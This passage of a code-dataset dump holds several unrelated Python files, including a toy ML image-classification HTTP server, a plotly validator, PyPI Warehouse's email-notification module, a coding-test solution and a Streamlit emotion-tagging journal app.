))\n","repo_name":"sswapnil2/data-structures-algorithms","sub_path":"binarytree/educative/sliding_window/problem1.py","file_name":"problem1.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34570441494","text":"from http.server import BaseHTTPRequestHandler, HTTPServer\nhost_name = \"localhost\"\nhost_port = 8080\n\nfrom ml import hello\n\nalgoFileName1 = 'linear'\nalgoFileName2 = 'conv'\nalgoFileName3 = 'perceptron'\nalgoFileName4 = 'none'\n\ndef getModelName(input):\n result = 
algoFileName1\n if input == '' :\n result = algoFileName1\n elif input == '1' :\n result = algoFileName1\n elif input == '2' :\n result = algoFileName2\n elif input == '3' :\n result = algoFileName3\n else :\n result = algoFileName4\n return result\n\nclass MyServer(BaseHTTPRequestHandler):\n def do_HEAD(self):\n self.send_response(200)\n self.send_header('Content-type', 'plain/text')\n self.send_header(\"Access-Control-Allow-Origin\", \"*\")\n self.end_headers()\n\n def do_POST(self):\n content_length = int(self.headers['Content-Length'])\n image = self.rfile.read(content_length)\n algoFile = getModelName(self.path[1:])\n\n result = hello(image, algoFile)\n\n self.do_HEAD()\n self.wfile.write(result.encode('utf-8'))\n\n def do_GET(self):\n self.do_HEAD()\n self.wfile.write('OK'.encode('utf-8'))\n\nif __name__ == '__main__':\n http_server = HTTPServer((host_name, host_port), MyServer)\n print(\"Running server on %s:%s\" % (host_name, host_port))\n http_server.serve_forever()","repo_name":"Effobless2/MachineLearningESGI4AL","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8374586658","text":"import _plotly_utils.basevalidators\n\n\nclass BarValidator(_plotly_utils.basevalidators.CompoundValidator):\n def __init__(self, plotly_name=\"bar\", parent_name=\"indicator.gauge\", **kwargs):\n super(BarValidator, self).__init__(\n plotly_name=plotly_name,\n parent_name=parent_name,\n data_class_str=kwargs.pop(\"data_class_str\", \"Bar\"),\n data_docs=kwargs.pop(\n \"data_docs\",\n \"\"\"\n color\n Sets the background color of the arc.\n line\n :class:`plotly.graph_objects.indicator.gauge.ba\n r.Line` instance or dict with compatible\n properties\n thickness\n Sets the thickness of the bar as a fraction of\n the total thickness of the gauge.\n\"\"\",\n ),\n **kwargs,\n )\n","repo_name":"plotly/plotly.py","sub_path":"packages/python/plotly/plotly/validators/indicator/gauge/_bar.py","file_name":"_bar.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":14438,"dataset":"github-code","pt":"3"} +{"seq_id":"43024019354","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport datetime\nimport functools\n\nfrom email.headerregistry import Address\n\nimport pytz\nimport sentry_sdk\n\nfrom celery.schedules import crontab\nfrom first import first\nfrom pyramid_mailer.exceptions import BadHeaders, EncodingError, InvalidMessage\nfrom sqlalchemy.exc import NoResultFound\n\nfrom warehouse import tasks\nfrom warehouse.accounts.interfaces import ITokenService, IUserService\nfrom warehouse.accounts.models import Email\nfrom warehouse.email.interfaces import IEmailSender\nfrom warehouse.email.services import EmailMessage\nfrom warehouse.email.ses.tasks import cleanup as ses_cleanup\nfrom warehouse.events.tags import EventTag\nfrom warehouse.metrics.interfaces import IMetricsService\n\n\ndef _compute_recipient(user, 
email):\n # We want to try and use the user's name, then their username, and finally\n # nothing to display a \"Friendly\" name for the recipient.\n return str(Address(first([user.name, user.username], default=\"\"), addr_spec=email))\n\n\ndef _redact_ip(request, email):\n # We should only store/display IP address of an 'email sent' event if the user\n # who triggered the email event is the one who receives the email. Else display\n # 'Redacted' to prevent user privacy concerns. If we don't know the user who\n # triggered the action, default to showing the IP of the source.\n\n try:\n user_email = request.db.query(Email).filter(Email.email == email).one()\n except NoResultFound:\n # The email might have been deleted if this is an account deletion event\n return False\n\n if request._unauthenticated_userid:\n return user_email.user_id != request._unauthenticated_userid\n if request.user:\n return user_email.user_id != request.user.id\n if request.remote_addr == \"127.0.0.1\":\n # This is the IP used when synthesizing a request in a task\n return True\n return False\n\n\n@tasks.task(bind=True, ignore_result=True, acks_late=True)\ndef send_email(task, request, recipient, msg, success_event):\n msg = EmailMessage(**msg)\n sender = request.find_service(IEmailSender)\n\n try:\n sender.send(recipient, msg)\n user_service = request.find_service(IUserService, context=None)\n user = user_service.get_user(success_event.pop(\"user_id\"))\n success_event[\"request\"] = request\n if user is not None: # We send account deletion confirmation emails\n user.record_event(**success_event)\n except (BadHeaders, EncodingError, InvalidMessage) as exc:\n raise exc\n except Exception as exc:\n # Send any other exception to Sentry, but don't re-raise it\n sentry_sdk.capture_exception(exc)\n task.retry(exc=exc)\n\n\ndef _send_email_to_user(\n request,\n user,\n msg,\n *,\n email=None,\n allow_unverified=False,\n repeat_window=None,\n):\n # If we were not given a specific email object, then we'll default to using\n # the User's primary email address.\n if email is None:\n email = user.primary_email\n\n # If we were not able to locate an email address for this user, then we will just\n # have to skip sending email to them. 
If we have an email for them, then we will\n # check to see if it is verified, if it is not then we will also skip sending email\n # to them **UNLESS** we've been told to allow unverified emails.\n if email is None or not (email.verified or allow_unverified):\n return\n\n # If we've already sent this email within the repeat_window, don't send it.\n if repeat_window is not None:\n sender = request.find_service(IEmailSender)\n last_sent = sender.last_sent(to=email.email, subject=msg.subject)\n if last_sent and (datetime.datetime.now() - last_sent) <= repeat_window:\n return\n\n request.task(send_email).delay(\n _compute_recipient(user, email.email),\n {\n \"subject\": msg.subject,\n \"body_text\": msg.body_text,\n \"body_html\": msg.body_html,\n },\n {\n \"tag\": EventTag.Account.EmailSent,\n \"user_id\": user.id,\n \"additional\": {\n \"from_\": request.registry.settings.get(\"mail.sender\"),\n \"to\": email.email,\n \"subject\": msg.subject,\n \"redact_ip\": _redact_ip(request, email.email),\n },\n },\n )\n\n\ndef _email(\n name,\n *,\n allow_unverified=False,\n repeat_window=None,\n):\n \"\"\"\n This decorator is used to turn an e function into an email sending function!\n\n The name parameter is the name of the email we're going to be sending (used to\n locate the templates on the file system).\n\n The allow_unverified kwarg flags whether we will send this email to an unverified\n email or not. We generally do not want to do this, but some emails are important\n enough or have special requirements that require it.\n\n Functions that are decorated by this need to accept two positional arguments, the\n first argument is the Pyramid request object, and the second argument is either\n a single User, or a list of Users. These users represent the recipients of this\n email. 
Additional keyword arguments are supported, but are not otherwise restricted.\n\n Functions decorated by this must return a mapping of context variables that will\n ultimately be returned, but which will also be used to render the templates for\n the emails.\n\n Thus this function can decorate functions with a signature like so:\n\n def foo(\n request: Request, user_or_users: Union[User, List[User]]\n ) -> Mapping[str, Any]:\n ...\n\n Finally, if the email needs to be sent to an address *other* than the user's primary\n email address, instead of a User object, a tuple of (User, Email) objects may be\n used in place of a User object.\n \"\"\"\n\n def inner(fn):\n @functools.wraps(fn)\n def wrapper(request, user_or_users, **kwargs):\n if isinstance(user_or_users, (list, set)):\n recipients = user_or_users\n else:\n recipients = [user_or_users]\n\n context = fn(request, user_or_users, **kwargs)\n msg = EmailMessage.from_template(name, context, request=request)\n\n for recipient in recipients:\n if isinstance(recipient, tuple):\n user, email = recipient\n else:\n user, email = recipient, None\n\n _send_email_to_user(\n request,\n user,\n msg,\n email=email,\n allow_unverified=allow_unverified,\n repeat_window=repeat_window,\n )\n metrics = request.find_service(IMetricsService, context=None)\n metrics.increment(\n \"warehouse.emails.scheduled\",\n tags=[\n f\"template_name:{name}\",\n f\"allow_unverified:{allow_unverified}\",\n f\"repeat_window:{repeat_window.total_seconds()}\"\n if repeat_window\n else \"repeat_window:none\",\n ],\n )\n\n return context\n\n return wrapper\n\n return inner\n\n\n# Email templates for administrators.\n\n\n@_email(\"admin-new-organization-requested\")\ndef send_admin_new_organization_requested_email(\n request, user, *, organization_name, initiator_username, organization_id\n):\n return {\n \"initiator_username\": initiator_username,\n \"organization_id\": organization_id,\n \"organization_name\": organization_name,\n }\n\n\n@_email(\"admin-new-organization-approved\")\ndef send_admin_new_organization_approved_email(\n request, user, *, organization_name, initiator_username, message=\"\"\n):\n return {\n \"initiator_username\": initiator_username,\n \"message\": message,\n \"organization_name\": organization_name,\n }\n\n\n@_email(\"admin-new-organization-declined\")\ndef send_admin_new_organization_declined_email(\n request, user, *, organization_name, initiator_username, message=\"\"\n):\n return {\n \"initiator_username\": initiator_username,\n \"message\": message,\n \"organization_name\": organization_name,\n }\n\n\n@_email(\"admin-organization-renamed\")\ndef send_admin_organization_renamed_email(\n request, user, *, organization_name, previous_organization_name\n):\n return {\n \"organization_name\": organization_name,\n \"previous_organization_name\": previous_organization_name,\n }\n\n\n@_email(\"admin-organization-deleted\")\ndef send_admin_organization_deleted_email(request, user, *, organization_name):\n return {\n \"organization_name\": organization_name,\n }\n\n\n# Email templates for users.\n\n\n@_email(\"password-reset\", allow_unverified=True)\ndef send_password_reset_email(request, user_and_email):\n user, _ = user_and_email\n token_service = request.find_service(ITokenService, name=\"password\")\n token = token_service.dumps(\n {\n \"action\": \"password-reset\",\n \"user.id\": str(user.id),\n \"user.last_login\": str(\n user.last_login or datetime.datetime.min.replace(tzinfo=pytz.UTC)\n ),\n \"user.password_date\": str(\n user.password_date or 
datetime.datetime.min.replace(tzinfo=pytz.UTC)\n ),\n }\n )\n\n return {\n \"token\": token,\n \"username\": user.username,\n \"n_hours\": token_service.max_age // 60 // 60,\n }\n\n\n@_email(\"verify-email\", allow_unverified=True)\ndef send_email_verification_email(request, user_and_email):\n user, email = user_and_email\n token_service = request.find_service(ITokenService, name=\"email\")\n token = token_service.dumps({\"action\": \"email-verify\", \"email.id\": email.id})\n\n return {\n \"token\": token,\n \"email_address\": email.email,\n \"n_hours\": token_service.max_age // 60 // 60,\n }\n\n\n@_email(\"new-email-added\")\ndef send_new_email_added_email(request, user_and_email, *, new_email_address):\n user, _ = user_and_email\n\n return {\n \"username\": user.username,\n \"new_email_address\": new_email_address,\n }\n\n\n@_email(\"password-change\")\ndef send_password_change_email(request, user):\n return {\"username\": user.username}\n\n\n@_email(\"password-compromised\", allow_unverified=True)\ndef send_password_compromised_email(request, user):\n return {}\n\n\n@_email(\"password-compromised-hibp\", allow_unverified=True)\ndef send_password_compromised_email_hibp(request, user):\n return {}\n\n\n@_email(\"token-compromised-leak\", allow_unverified=True)\ndef send_token_compromised_email_leak(request, user, *, public_url, origin):\n return {\"username\": user.username, \"public_url\": public_url, \"origin\": origin}\n\n\n@_email(\n \"basic-auth-with-2fa\",\n allow_unverified=True,\n repeat_window=datetime.timedelta(days=1),\n)\ndef send_basic_auth_with_two_factor_email(request, user, *, project_name):\n return {\"project_name\": project_name}\n\n\n@_email(\n \"two-factor-not-yet-enabled\",\n allow_unverified=True,\n repeat_window=datetime.timedelta(days=14),\n)\ndef send_two_factor_not_yet_enabled_email(request, user):\n return {\"username\": user.username}\n\n\n@_email(\"gpg-signature-uploaded\", repeat_window=datetime.timedelta(days=1))\ndef send_gpg_signature_uploaded_email(request, user, *, project_name):\n return {\"project_name\": project_name}\n\n\n@_email(\"account-deleted\")\ndef send_account_deletion_email(request, user):\n return {\"username\": user.username}\n\n\n@_email(\"primary-email-change\")\ndef send_primary_email_change_email(request, user_and_email):\n user, email = user_and_email\n return {\n \"username\": user.username,\n \"old_email\": email.email,\n \"new_email\": user.email,\n }\n\n\n@_email(\"new-organization-requested\")\ndef send_new_organization_requested_email(request, user, *, organization_name):\n return {\"organization_name\": organization_name}\n\n\n@_email(\"new-organization-approved\")\ndef send_new_organization_approved_email(\n request, user, *, organization_name, message=\"\"\n):\n return {\n \"message\": message,\n \"organization_name\": organization_name,\n }\n\n\n@_email(\"new-organization-declined\")\ndef send_new_organization_declined_email(\n request, user, *, organization_name, message=\"\"\n):\n return {\n \"message\": message,\n \"organization_name\": organization_name,\n }\n\n\n@_email(\"organization-project-added\")\ndef send_organization_project_added_email(\n request, user, *, organization_name, project_name\n):\n return {\n \"organization_name\": organization_name,\n \"project_name\": project_name,\n }\n\n\n@_email(\"organization-project-removed\")\ndef send_organization_project_removed_email(\n request, user, *, organization_name, project_name\n):\n return {\n \"organization_name\": organization_name,\n \"project_name\": 
project_name,\n }\n\n\n@_email(\"organization-member-invited\")\ndef send_organization_member_invited_email(\n request,\n email_recipients,\n *,\n user,\n desired_role,\n initiator_username,\n organization_name,\n email_token,\n token_age,\n):\n return {\n \"username\": user.username,\n \"desired_role\": desired_role,\n \"initiator_username\": initiator_username,\n \"n_hours\": token_age // 60 // 60,\n \"organization_name\": organization_name,\n \"token\": email_token,\n }\n\n\n@_email(\"verify-organization-role\", allow_unverified=True)\ndef send_organization_role_verification_email(\n request,\n user,\n *,\n desired_role,\n initiator_username,\n organization_name,\n email_token,\n token_age,\n):\n return {\n \"username\": user.username,\n \"desired_role\": desired_role,\n \"initiator_username\": initiator_username,\n \"n_hours\": token_age // 60 // 60,\n \"organization_name\": organization_name,\n \"token\": email_token,\n }\n\n\n@_email(\"organization-member-invite-canceled\")\ndef send_organization_member_invite_canceled_email(\n request,\n email_recipients,\n *,\n user,\n organization_name,\n):\n return {\n \"username\": user.username,\n \"organization_name\": organization_name,\n }\n\n\n@_email(\"canceled-as-invited-organization-member\")\ndef send_canceled_as_invited_organization_member_email(\n request,\n user,\n *,\n organization_name,\n):\n return {\n \"username\": user.username,\n \"organization_name\": organization_name,\n }\n\n\n@_email(\"organization-member-invite-declined\")\ndef send_organization_member_invite_declined_email(\n request,\n email_recipients,\n *,\n user,\n organization_name,\n message,\n):\n return {\n \"username\": user.username,\n \"organization_name\": organization_name,\n \"message\": message,\n }\n\n\n@_email(\"declined-as-invited-organization-member\")\ndef send_declined_as_invited_organization_member_email(\n request,\n user,\n *,\n organization_name,\n):\n return {\n \"username\": user.username,\n \"organization_name\": organization_name,\n }\n\n\n@_email(\"organization-member-added\")\ndef send_organization_member_added_email(\n request,\n email_recipients,\n *,\n user,\n submitter,\n organization_name,\n role,\n):\n return {\n \"username\": user.username,\n \"submitter\": submitter.username,\n \"organization_name\": organization_name,\n \"role\": role,\n }\n\n\n@_email(\"added-as-organization-member\")\ndef send_added_as_organization_member_email(\n request,\n user,\n *,\n submitter,\n organization_name,\n role,\n):\n return {\n \"username\": user.username,\n \"submitter\": submitter.username,\n \"organization_name\": organization_name,\n \"role\": role,\n }\n\n\n@_email(\"organization-member-removed\")\ndef send_organization_member_removed_email(\n request,\n email_recipients,\n *,\n user,\n submitter,\n organization_name,\n):\n return {\n \"username\": user.username,\n \"submitter\": submitter.username,\n \"organization_name\": organization_name,\n }\n\n\n@_email(\"removed-as-organization-member\")\ndef send_removed_as_organization_member_email(\n request,\n user,\n *,\n submitter,\n organization_name,\n):\n return {\n \"username\": user.username,\n \"submitter\": submitter.username,\n \"organization_name\": organization_name,\n }\n\n\n@_email(\"organization-member-role-changed\")\ndef send_organization_member_role_changed_email(\n request,\n email_recipients,\n *,\n user,\n submitter,\n organization_name,\n role,\n):\n return {\n \"username\": user.username,\n \"submitter\": submitter.username,\n \"organization_name\": organization_name,\n 
\"role\": role,\n }\n\n\n@_email(\"role-changed-as-organization-member\")\ndef send_role_changed_as_organization_member_email(\n request,\n user,\n *,\n submitter,\n organization_name,\n role,\n):\n return {\n \"username\": user.username,\n \"organization_name\": organization_name,\n \"submitter\": submitter.username,\n \"role\": role,\n }\n\n\n@_email(\"organization-updated\")\ndef send_organization_updated_email(\n request,\n user,\n *,\n organization_name,\n organization_display_name,\n organization_link_url,\n organization_description,\n organization_orgtype,\n previous_organization_display_name,\n previous_organization_link_url,\n previous_organization_description,\n previous_organization_orgtype,\n):\n return {\n \"organization_name\": organization_name,\n \"organization_display_name\": organization_display_name,\n \"organization_link_url\": organization_link_url,\n \"organization_description\": organization_description,\n \"organization_orgtype\": organization_orgtype,\n \"previous_organization_display_name\": previous_organization_display_name,\n \"previous_organization_link_url\": previous_organization_link_url,\n \"previous_organization_description\": previous_organization_description,\n \"previous_organization_orgtype\": previous_organization_orgtype,\n }\n\n\n@_email(\"organization-renamed\")\ndef send_organization_renamed_email(\n request, user, *, organization_name, previous_organization_name\n):\n return {\n \"organization_name\": organization_name,\n \"previous_organization_name\": previous_organization_name,\n }\n\n\n@_email(\"organization-deleted\")\ndef send_organization_deleted_email(request, user, *, organization_name):\n return {\n \"organization_name\": organization_name,\n }\n\n\n@_email(\"team-created\")\ndef send_team_created_email(request, user, *, organization_name, team_name):\n return {\n \"organization_name\": organization_name,\n \"team_name\": team_name,\n }\n\n\n@_email(\"team-deleted\")\ndef send_team_deleted_email(request, user, *, organization_name, team_name):\n return {\n \"organization_name\": organization_name,\n \"team_name\": team_name,\n }\n\n\n@_email(\"team-member-added\")\ndef send_team_member_added_email(\n request,\n email_recipients,\n *,\n user,\n submitter,\n organization_name,\n team_name,\n):\n return {\n \"username\": user.username,\n \"submitter\": submitter.username,\n \"organization_name\": organization_name,\n \"team_name\": team_name,\n }\n\n\n@_email(\"added-as-team-member\")\ndef send_added_as_team_member_email(\n request,\n user,\n *,\n submitter,\n organization_name,\n team_name,\n):\n return {\n \"username\": user.username,\n \"submitter\": submitter.username,\n \"organization_name\": organization_name,\n \"team_name\": team_name,\n }\n\n\n@_email(\"team-member-removed\")\ndef send_team_member_removed_email(\n request,\n email_recipients,\n *,\n user,\n submitter,\n organization_name,\n team_name,\n):\n return {\n \"username\": user.username,\n \"submitter\": submitter.username,\n \"organization_name\": organization_name,\n \"team_name\": team_name,\n }\n\n\n@_email(\"removed-as-team-member\")\ndef send_removed_as_team_member_email(\n request,\n user,\n *,\n submitter,\n organization_name,\n team_name,\n):\n return {\n \"username\": user.username,\n \"submitter\": submitter.username,\n \"organization_name\": organization_name,\n \"team_name\": team_name,\n }\n\n\n@_email(\"verify-project-role\", allow_unverified=True)\ndef send_project_role_verification_email(\n request,\n user,\n desired_role,\n initiator_username,\n 
project_name,\n email_token,\n token_age,\n):\n return {\n \"desired_role\": desired_role,\n \"email_address\": user.email,\n \"initiator_username\": initiator_username,\n \"n_hours\": token_age // 60 // 60,\n \"project_name\": project_name,\n \"token\": email_token,\n }\n\n\n@_email(\"collaborator-added\")\ndef send_collaborator_added_email(\n request, email_recipients, *, user, submitter, project_name, role\n):\n return {\n \"username\": user.username,\n \"project\": project_name,\n \"submitter\": submitter.username,\n \"role\": role,\n }\n\n\n@_email(\"added-as-collaborator\")\ndef send_added_as_collaborator_email(request, user, *, submitter, project_name, role):\n return {\n \"project_name\": project_name,\n \"initiator_username\": submitter.username,\n \"role\": role,\n }\n\n\n@_email(\"collaborator-removed\")\ndef send_collaborator_removed_email(\n request, email_recipients, *, user, submitter, project_name\n):\n return {\n \"username\": user.username,\n \"project\": project_name,\n \"submitter\": submitter.username,\n }\n\n\n@_email(\"removed-as-collaborator\")\ndef send_removed_as_collaborator_email(request, user, *, submitter, project_name):\n return {\n \"project\": project_name,\n \"submitter\": submitter.username,\n }\n\n\n@_email(\"collaborator-role-changed\")\ndef send_collaborator_role_changed_email(\n request, recipients, *, user, submitter, project_name, role\n):\n return {\n \"username\": user.username,\n \"project\": project_name,\n \"submitter\": submitter.username,\n \"role\": role,\n }\n\n\n@_email(\"role-changed-as-collaborator\")\ndef send_role_changed_as_collaborator_email(\n request, user, *, submitter, project_name, role\n):\n return {\n \"project\": project_name,\n \"submitter\": submitter.username,\n \"role\": role,\n }\n\n\n@_email(\"team-collaborator-added\")\ndef send_team_collaborator_added_email(\n request, email_recipients, *, team, submitter, project_name, role\n):\n return {\n \"team_name\": team.name,\n \"project\": project_name,\n \"submitter\": submitter.username,\n \"role\": role,\n }\n\n\n@_email(\"added-as-team-collaborator\")\ndef send_added_as_team_collaborator_email(\n request, email_recipients, *, team, submitter, project_name, role\n):\n return {\n \"team_name\": team.name,\n \"project\": project_name,\n \"submitter\": submitter.username,\n \"role\": role,\n }\n\n\n@_email(\"team-collaborator-removed\")\ndef send_team_collaborator_removed_email(\n request, email_recipients, *, team, submitter, project_name\n):\n return {\n \"team_name\": team.name,\n \"project\": project_name,\n \"submitter\": submitter.username,\n }\n\n\n@_email(\"removed-as-team-collaborator\")\ndef send_removed_as_team_collaborator_email(\n request, email_recipients, *, team, submitter, project_name\n):\n return {\n \"team_name\": team.name,\n \"project\": project_name,\n \"submitter\": submitter.username,\n }\n\n\n@_email(\"team-collaborator-role-changed\")\ndef send_team_collaborator_role_changed_email(\n request, email_recipients, *, team, submitter, project_name, role\n):\n return {\n \"team_name\": team.name,\n \"project\": project_name,\n \"submitter\": submitter.username,\n \"role\": role,\n }\n\n\n@_email(\"role-changed-as-team-collaborator\")\ndef send_role_changed_as_team_collaborator_email(\n request, email_recipients, *, team, submitter, project_name, role\n):\n return {\n \"team_name\": team.name,\n \"project\": project_name,\n \"submitter\": submitter.username,\n \"role\": role,\n }\n\n\n@_email(\"two-factor-added\")\ndef send_two_factor_added_email(request, 
user, method):\n pretty_methods = {\"totp\": \"TOTP\", \"webauthn\": \"WebAuthn\"}\n return {\"method\": pretty_methods[method], \"username\": user.username}\n\n\n@_email(\"two-factor-removed\")\ndef send_two_factor_removed_email(request, user, method):\n pretty_methods = {\"totp\": \"TOTP\", \"webauthn\": \"WebAuthn\"}\n return {\"method\": pretty_methods[method], \"username\": user.username}\n\n\n@_email(\"removed-project\")\ndef send_removed_project_email(\n request, user, *, project_name, submitter_name, submitter_role, recipient_role\n):\n recipient_role_descr = \"an owner\"\n if recipient_role == \"Maintainer\":\n recipient_role_descr = \"a maintainer\"\n\n return {\n \"project_name\": project_name,\n \"submitter_name\": submitter_name,\n \"submitter_role\": submitter_role.lower(),\n \"recipient_role_descr\": recipient_role_descr,\n }\n\n\n@_email(\"yanked-project-release\")\ndef send_yanked_project_release_email(\n request, user, *, release, submitter_name, submitter_role, recipient_role\n):\n recipient_role_descr = \"an owner\"\n if recipient_role == \"Maintainer\":\n recipient_role_descr = \"a maintainer\"\n\n return {\n \"project\": release.project.name,\n \"release\": release.version,\n \"release_date\": release.created.strftime(\"%Y-%m-%d\"),\n \"submitter\": submitter_name,\n \"submitter_role\": submitter_role.lower(),\n \"recipient_role_descr\": recipient_role_descr,\n \"yanked_reason\": release.yanked_reason,\n }\n\n\n@_email(\"unyanked-project-release\")\ndef send_unyanked_project_release_email(\n request, user, *, release, submitter_name, submitter_role, recipient_role\n):\n recipient_role_descr = \"an owner\"\n if recipient_role == \"Maintainer\":\n recipient_role_descr = \"a maintainer\"\n\n return {\n \"project\": release.project.name,\n \"release\": release.version,\n \"release_date\": release.created.strftime(\"%Y-%m-%d\"),\n \"submitter\": submitter_name,\n \"submitter_role\": submitter_role.lower(),\n \"recipient_role_descr\": recipient_role_descr,\n }\n\n\n@_email(\"removed-project-release\")\ndef send_removed_project_release_email(\n request, user, *, release, submitter_name, submitter_role, recipient_role\n):\n recipient_role_descr = \"an owner\"\n if recipient_role == \"Maintainer\":\n recipient_role_descr = \"a maintainer\"\n\n return {\n \"project_name\": release.project.name,\n \"release_version\": release.version,\n \"release_date\": release.created.strftime(\"%Y-%m-%d\"),\n \"submitter_name\": submitter_name,\n \"submitter_role\": submitter_role.lower(),\n \"recipient_role_descr\": recipient_role_descr,\n }\n\n\n@_email(\"removed-project-release-file\")\ndef send_removed_project_release_file_email(\n request, user, *, file, release, submitter_name, submitter_role, recipient_role\n):\n recipient_role_descr = \"an owner\"\n if recipient_role == \"Maintainer\":\n recipient_role_descr = \"a maintainer\"\n\n return {\n \"file\": file,\n \"project_name\": release.project.name,\n \"release_version\": release.version,\n \"submitter_name\": submitter_name,\n \"submitter_role\": submitter_role.lower(),\n \"recipient_role_descr\": recipient_role_descr,\n }\n\n\n@_email(\"recovery-codes-generated\")\ndef send_recovery_codes_generated_email(request, user):\n return {\"username\": user.username}\n\n\n@_email(\"recovery-code-used\")\ndef send_recovery_code_used_email(request, user):\n return {\"username\": user.username}\n\n\n@_email(\"recovery-code-reminder\")\ndef send_recovery_code_reminder_email(request, user):\n return {\"username\": 
user.username}\n\n\n@_email(\"trusted-publisher-added\")\ndef send_trusted_publisher_added_email(request, user, project_name, publisher):\n # We use the request's user, since they're the one triggering the action.\n return {\n \"username\": request.user.username,\n \"project_name\": project_name,\n \"publisher\": publisher,\n }\n\n\n@_email(\"trusted-publisher-removed\")\ndef send_trusted_publisher_removed_email(request, user, project_name, publisher):\n # We use the request's user, since they're the one triggering the action.\n return {\n \"username\": request.user.username,\n \"project_name\": project_name,\n \"publisher\": publisher,\n }\n\n\n@_email(\"pending-trusted-publisher-invalidated\")\ndef send_pending_trusted_publisher_invalidated_email(request, user, project_name):\n return {\n \"project_name\": project_name,\n }\n\n\ndef includeme(config):\n email_sending_class = config.maybe_dotted(config.registry.settings[\"mail.backend\"])\n config.register_service_factory(email_sending_class.create_service, IEmailSender)\n\n # Add a periodic task to cleanup our EmailMessage table. We're going to\n # do this cleanup, regardless of if we're configured to use SES to send\n # or not, because even if we stop using SES, we'll want to remove any\n # emails that had been sent, and the cost of doing this is very low.\n config.add_periodic_task(crontab(minute=0, hour=0), ses_cleanup)\n","repo_name":"pypi/warehouse","sub_path":"warehouse/email/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":29759,"program_lang":"python","lang":"en","doc_type":"code","stars":3382,"dataset":"github-code","pt":"3"} +{"seq_id":"2287576568","text":"#https://programmers.co.kr/learn/courses/30/lessons/83201\nimport sys\ndef solution(scores):\n answer = ''\n N=len(scores[0])\n for i in range(N):\n temp=[]\n mine=0\n for j in range(N):\n if i==j:\n mine=scores[j][i]\n temp.append(scores[j][i])\n temp.sort()\n if mine==max(temp) and temp[N-1]!=temp[N-2]:\n temp.remove(mine)\n elif mine==min(temp) and temp[0]!=temp[1]:\n temp.remove(mine)\n avg=sum(temp)/len(temp)\n if avg>=90:\n answer+='A'\n elif avg>=80:\n answer+='B'\n elif avg>=70:\n answer+='C'\n elif avg>=50:\n answer+='D'\n else:\n answer+='F'\n return answer","repo_name":"Myunwoo/algorithm_study","sub_path":"sort/programmers83201.py","file_name":"programmers83201.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25984854495","text":"import numpy as np\r\nimport pandas as pd\r\nimport csv\r\nfrom PIL import Image\r\n\r\nfrom datetime import datetime\r\nfrom datetime import date\r\n\r\nimport streamlit as st\r\n\r\nimport tensorflow as tf\r\n\r\nfrom tensorflow.keras.preprocessing.text import Tokenizer\r\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\r\n\r\nfrom tensorflow.keras.models import load_model\r\n\r\ntrain_data = pd.read_csv(\"tweet_emotions.csv\")\r\ntrain_data.head()\r\n\r\ntraining_sentences = []\r\n\r\nfor i in range(len(train_data)):\r\n sentence = train_data.loc[i, \"content\"]\r\n training_sentences.append(sentence)\r\n\r\n\r\nmodel = load_model(\"Tweets_Text_Emotion.h5\")\r\n\r\nvocab_size = 40000\r\nmax_length = 100\r\ntrunc_type = \"post\"\r\npadding_type = \"post\"\r\noov_tok = \"\"\r\n\r\n\r\ntokenizer = Tokenizer(num_words=vocab_size, 
oov_token=oov_tok)\r\ntokenizer.fit_on_texts(training_sentences)\r\n\r\n\r\n################################################################################################################\r\ndate_time = date.today().strftime(\"%A %d %B %Y\")\r\n\r\nemo_code_url = {\r\n \"empty\": [0, \"./emoticons/Empty.png\"],\r\n \"sadness\": [1, \"./emoticons/Sadness.png\"],\r\n \"enthusiasm\": [2, \"./emoticons/Enthusiasm.png\"],\r\n \"neutral\": [3, \"./emoticons/Neutral.png\"],\r\n \"worry\": [4, \"./emoticons/Worry.png\"],\r\n \"surprise\": [5, \"./emoticons/Surprise.png\"],\r\n \"love\": [6, \"./emoticons/Love.png\"],\r\n \"fun\": [7, \"./emoticons/Fun.png\"],\r\n \"hate\": [8, \"./emoticons/Hate.png\"],\r\n \"happiness\": [9, \"./emoticons/Happiness.png\"],\r\n \"boredom\": [10, \"./emoticons/Boredom.png\"],\r\n \"relief\": [11, \"./emoticons/Relief.png\"],\r\n \"anger\": [12, \"./emoticons/Anger.png\"],\r\n}\r\n\r\n\r\ndef save(text, emotion):\r\n with open(\"data_entry.csv\", \"a\") as f:\r\n f.write(\"%s,%s,%s\\n\" % (date_time, text, emotion))\r\n\r\n\r\ndef app_headers():\r\n # Title\r\n st.title(\"Digital Journal\")\r\n # Day and Date\r\n st.write(date_time)\r\n\r\n\r\ndef new_entry():\r\n # New Entry\r\n input = st.empty()\r\n text = str(input.text_input(\"How was your day?\"))\r\n\r\n if text != \"\":\r\n sentence = []\r\n sentence.append(text)\r\n print(sentence)\r\n\r\n sequences = tokenizer.texts_to_sequences(sentence)\r\n print(\"sequence\", sequences)\r\n\r\n padded = pad_sequences(\r\n sequences, maxlen=max_length, padding=padding_type, truncating=trunc_type\r\n )\r\n testing_padded = np.array(padded)\r\n\r\n predicted_class_label = np.argmax(model.predict(testing_padded), axis=-1)\r\n print(predicted_class_label)\r\n emotion = \"\"\r\n emoticon = \"\"\r\n col1, col2, col3 = st.columns(3)\r\n for key, value in emo_code_url.items():\r\n if value[0] == predicted_class_label:\r\n emotion = key\r\n emoticon = value[1]\r\n with col1:\r\n st.write(key.upper())\r\n with col2:\r\n image = Image.open(emoticon)\r\n st.image(image, width=60)\r\n \r\n with col3:\r\n if st.button(\"Save Entry\"): \r\n save(text, emotion)\r\n # text = input.text_input(\"\") \r\n \r\n 